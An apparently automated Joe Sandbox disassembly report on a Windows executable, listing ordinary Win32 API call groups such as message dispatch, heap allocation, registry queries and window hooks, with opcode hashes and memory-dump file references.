                                                                                              • Instruction ID: 4a0254a43c1e3588e48c1e462ee64abe08c7cd62e9e1b92a79ad5815ace06fc1
                                                                                              • Opcode Fuzzy Hash: baa4575744bcffb4867a31880af86c8239e7816c7f4c7781bfc20bb34485b732
                                                                                              • Instruction Fuzzy Hash: 9B21D4323016106FD7109B69DC8DF2B77ACEB49B55F10406EF541EB2D0DAB8A801C7A5
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000030,00000000,00000000,00000000), ref: 0045B600
                                                                                              • TranslateMessage.USER32(00000030), ref: 0045B61F
                                                                                              • DispatchMessageA.USER32(00000030), ref: 0045B626
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$CallbackDispatchDispatcherTranslateUser
                                                                                              • String ID:
                                                                                              • API String ID: 2960505505-0
                                                                                              • Opcode ID: b4a6a35ade7ed14936ff1922dd7b31983e8294f2af7dbd9086ee59b7b801dfec
                                                                                              • Instruction ID: 06f4cbef7ab207f2fff16cb34858fb85fe973bf41392bcce92dd4f4ecb0072a7
                                                                                              • Opcode Fuzzy Hash: b4a6a35ade7ed14936ff1922dd7b31983e8294f2af7dbd9086ee59b7b801dfec
                                                                                              • Instruction Fuzzy Hash: 93F05E71211851AFA7156B319C089BF76ACEF0135BB05406BF801C6212EB68CD468AEF
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(?,?,00000005), ref: 00456168
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00456170
                                                                                              • FreeResource.KERNEL32(00000000), ref: 00456188
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindFreeLoad
                                                                                              • String ID:
                                                                                              • API String ID: 934874419-0
                                                                                              • Opcode ID: ab0f40a6e43c0a41c589bfbde39cb591226471d23c8e9bd6ba915b6870995341
                                                                                              • Instruction ID: fccebd9682a858cdeb5031e85e51eaab4cad9e1c6797173475c662a524fb5943
                                                                                              • Opcode Fuzzy Hash: ab0f40a6e43c0a41c589bfbde39cb591226471d23c8e9bd6ba915b6870995341
                                                                                              • Instruction Fuzzy Hash: 0AF05471601B11ABC7105B659C88EABFB9CFF59366F45002AF944C3312D77898048AA9
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042EFD4
                                                                                              • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042F03E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: e11a1a5f31f4cb33b024c01f2dbf4c1542a7e5af66afb4619ba965c6068a4425
                                                                                              • Instruction ID: cfda056f3e1bfb89349e09b922290d6e6db6a01bb08bf723edffdc8e6ae5ea85
                                                                                              • Opcode Fuzzy Hash: e11a1a5f31f4cb33b024c01f2dbf4c1542a7e5af66afb4619ba965c6068a4425
                                                                                              • Instruction Fuzzy Hash: 4C110A71204750ABC310DF59D880F97B7E8FB48B14F80063EF46497681D738E8058BA6
                                                                                              APIs
                                                                                                • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                                                                              • GetWindowRect.USER32(?,?), ref: 00457D0C
                                                                                              • GetWindow.USER32(?,00000004), ref: 00457D29
                                                                                                • Part of subcall function 00459926: IsWindowEnabled.USER32(?), ref: 0045992F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledLongRect
                                                                                              • String ID:
                                                                                              • API String ID: 3170195891-0
                                                                                              • Opcode ID: e782368540316d1cacdbfc55745b2c3869e6f7dbff5383a13291f65101c725e8
                                                                                              • Instruction ID: 375d3ee3df655b8212e251599233aac5bdcbf11d9cda8cb0e33f1c270f2b4009
                                                                                              • Opcode Fuzzy Hash: e782368540316d1cacdbfc55745b2c3869e6f7dbff5383a13291f65101c725e8
                                                                                              • Instruction Fuzzy Hash: 3101A7316046089BDF14EF25E855BBF77B5AF05306F00446AED02973A3DB78DD0D8A58
                                                                                              APIs
                                                                                              • __lock.LIBCMT ref: 00447CC3
                                                                                                • Part of subcall function 0044D832: EnterCriticalSection.KERNEL32(?,?,?,00447CC8,00000004,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 0044D85A
                                                                                              • RtlFreeHeap.NTDLL(00000000,?,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 00447D0A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterFreeHeapSection__lock
                                                                                              • String ID:
                                                                                              • API String ID: 3012239193-0
                                                                                              • Opcode ID: ac1540a0b851fcdb40e3e79ba1efe0328e53520ba3295f022b908cb1df8d684a
                                                                                              • Instruction ID: d955b6addba1c6b7a19bfec433c3d98e9b43adaac541c227c5d3499d9416ad9c
                                                                                              • Opcode Fuzzy Hash: ac1540a0b851fcdb40e3e79ba1efe0328e53520ba3295f022b908cb1df8d684a
                                                                                              • Instruction Fuzzy Hash: 96F0B471D16315AAFF207B62AC07B6F7B60AF00769F20412FF410652D1CB7C5A52DA9D
                                                                                              APIs
                                                                                              • __lock.LIBCMT ref: 00447E2A
                                                                                                • Part of subcall function 0044D832: EnterCriticalSection.KERNEL32(?,?,?,00447CC8,00000004,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 0044D85A
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,004CAFE8,0000000C,00447E93,000000E0,00447EBE,?,0044D7B5,00000018,004CBC70,00000008,0044D84B,?,?), ref: 00447E6B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCriticalEnterHeapSection__lock
                                                                                              • String ID:
                                                                                              • API String ID: 409319249-0
                                                                                              • Opcode ID: c04b9e8e06a6364d5c1f494db0ccfd713c89f64cbde72ec4706e017656008a0b
                                                                                              • Instruction ID: f1a8fd19c40bd1083452c9b815fd926fceb10cfad15d11fd48909767391a0784
                                                                                              • Opcode Fuzzy Hash: c04b9e8e06a6364d5c1f494db0ccfd713c89f64cbde72ec4706e017656008a0b
                                                                                              • Instruction Fuzzy Hash: 31F0CD32D416249AFB20BB759E0675F7760BB10728F30436BE8202A3E1C73C1D52CA8E
                                                                                              APIs
                                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 0045DD2C
                                                                                              • GetWindowTextA.USER32(00000000,00000000,00000000), ref: 0045DD41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow$Length
                                                                                              • String ID:
                                                                                              • API String ID: 1006428111-0
                                                                                              • Opcode ID: 720720b7826cd516c124d1c9f667a6bb5a0a754d63c71446cbaca4b57f6d7706
                                                                                              • Instruction ID: 3df95a50f7c5756162ba1c81e646130b5dca14df09544dfd3e809bef63806a36
                                                                                              • Opcode Fuzzy Hash: 720720b7826cd516c124d1c9f667a6bb5a0a754d63c71446cbaca4b57f6d7706
                                                                                              • Instruction Fuzzy Hash: 59F0E932100105EBCB20AF51DC04DAF772DEF49362F04011AFD1547151DB385415CBA9
                                                                                              APIs
                                                                                              • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,80000002,?,?,?,0043062F,80000002,00000000,?,00402EF7), ref: 004305EC
                                                                                              • GetLastError.KERNEL32(?,?,0043062F,80000002,00000000,?,00402EF7), ref: 004305F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 1349404517-0
                                                                                              • Opcode ID: 4b12fa7677ebd328b7f12a0ba8178812c3b22382074bc9e6808d752de9ad009f
                                                                                              • Instruction ID: fe9462d29a9da7b837a2406539751575587682de2b60d7ac772098d07a0583a7
                                                                                              • Opcode Fuzzy Hash: 4b12fa7677ebd328b7f12a0ba8178812c3b22382074bc9e6808d752de9ad009f
                                                                                              • Instruction Fuzzy Hash: 0FF01C722042116BD314CB58EC04F5BB7E8EBD8B51F10822EFA86D7280DBA0991587A9
                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,?,?,?), ref: 004562B0
                                                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 004562C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcWindow$Call
                                                                                              • String ID:
                                                                                              • API String ID: 2316559721-0
                                                                                              • Opcode ID: 7c14ae1876ad108138e0c2b43aed3fef796ce7489ec108068f17dd744e4f0651
                                                                                              • Instruction ID: 724d7a8fdadb4652615dbb9f4325778996f429c979f1ed0c0a89b8764ad68d23
                                                                                              • Opcode Fuzzy Hash: 7c14ae1876ad108138e0c2b43aed3fef796ce7489ec108068f17dd744e4f0651
                                                                                              • Instruction Fuzzy Hash: 2FF01C36100605FFCF215F95DC04D9A7BB9FF08352F418469F90987631D776E824AB54
                                                                                              APIs
                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,004481DD,00000001,?,004CAFF8,00000060), ref: 0044D69F
                                                                                                • Part of subcall function 0044D863: HeapAlloc.KERNEL32(00000000,00000140,0044D6C7,000003F8,?,004CAFF8,00000060), ref: 0044D870
                                                                                              • HeapDestroy.KERNEL32(?,004CAFF8,00000060), ref: 0044D6D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocCreateDestroy
                                                                                              • String ID:
                                                                                              • API String ID: 2236781399-0
                                                                                              • Opcode ID: bcabe9e55bb853ce9606875af35cc23512099b3aa20cb19af125bf1c2520e8ce
                                                                                              • Instruction ID: 75e7420880b69f34e065517e2ae9d8fd4c88d18d1bcf8fff13bf1802494dd5c5
                                                                                              • Opcode Fuzzy Hash: bcabe9e55bb853ce9606875af35cc23512099b3aa20cb19af125bf1c2520e8ce
                                                                                              • Instruction Fuzzy Hash: F1E0D871E113006BFB006F357E0832637D49B45345F014937F405D5294FB748410DA0E
                                                                                              APIs
                                                                                                • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00458AF5
                                                                                              • SetWindowsHookExA.USER32(00000005,Function_000588B4,00000000,00000000), ref: 00458B05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentH_prologHookThreadWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2183259885-0
                                                                                              • Opcode ID: f41d2774eea753fce7038d8cf1bba76ec0a83b13827fae0ef50e3a3f985bd47e
                                                                                              • Instruction ID: 5f91b5a6e92888a10516239ab813794ae4ba7b6c56ba3dc280b3d2880adb0640
                                                                                              • Opcode Fuzzy Hash: f41d2774eea753fce7038d8cf1bba76ec0a83b13827fae0ef50e3a3f985bd47e
                                                                                              • Instruction Fuzzy Hash: FAE09B717407009BD2306F125C0971776A8DBC4B27F10453FF945AA245DE74684CC67F
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                                                                              • GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3359735512-0
                                                                                              • Opcode ID: 35defb75280334056dcad91695dd74def03daa0eb104eab090d3a280f410746c
                                                                                              • Instruction ID: d694ad6d0416bea9128f64c78c3a1527c4c8503895f06f341b73c71a9d6b33f9
                                                                                              • Opcode Fuzzy Hash: 35defb75280334056dcad91695dd74def03daa0eb104eab090d3a280f410746c
                                                                                              • Instruction Fuzzy Hash: 7CD05E313057107BC3749B58EC04FA7BBD8EB88B80F00842AFA49C3250DAB0D840CBB5
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0045B7D9
                                                                                              • SetWindowsHookExA.USER32(000000FF,0045B648,00000000,00000000), ref: 0045B7E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentHookThreadWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1904029216-0
                                                                                              • Opcode ID: caa397c9cf1992df8d3d644f132b9f788036187670f4d340d85928ce480f1793
                                                                                              • Instruction ID: e7a0d55e888616423550d49620b794bcb0c811eaca6d3862d66bd71e3f1928a1
                                                                                              • Opcode Fuzzy Hash: caa397c9cf1992df8d3d644f132b9f788036187670f4d340d85928ce480f1793
                                                                                              • Instruction Fuzzy Hash: B1D0A7314456506EE71027717C0DB9E3A50DB05326F150397F811551D2EB6845448B9F
                                                                                              APIs
                                                                                              • LoadIconA.USER32(?,00000080), ref: 0043A722
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoad
                                                                                              • String ID:
                                                                                              • API String ID: 2457776203-0
                                                                                              • Opcode ID: 987dc8aa1c4b3a391572c1f90d36992d096fb491d6f713308c818d54bd36514a
                                                                                              • Instruction ID: 274c6e8b6375608b12aaefe698a568ec2b24333b2e26eb9f58feebfc558e2af9
                                                                                              • Opcode Fuzzy Hash: 987dc8aa1c4b3a391572c1f90d36992d096fb491d6f713308c818d54bd36514a
                                                                                              • Instruction Fuzzy Hash: 73318F746047419ED310DF6AC445B8BFBE4FF59704F40481EE4AA87281CBB86508CFA6
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00457D65
                                                                                                • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                                                                              Memory Dump Source
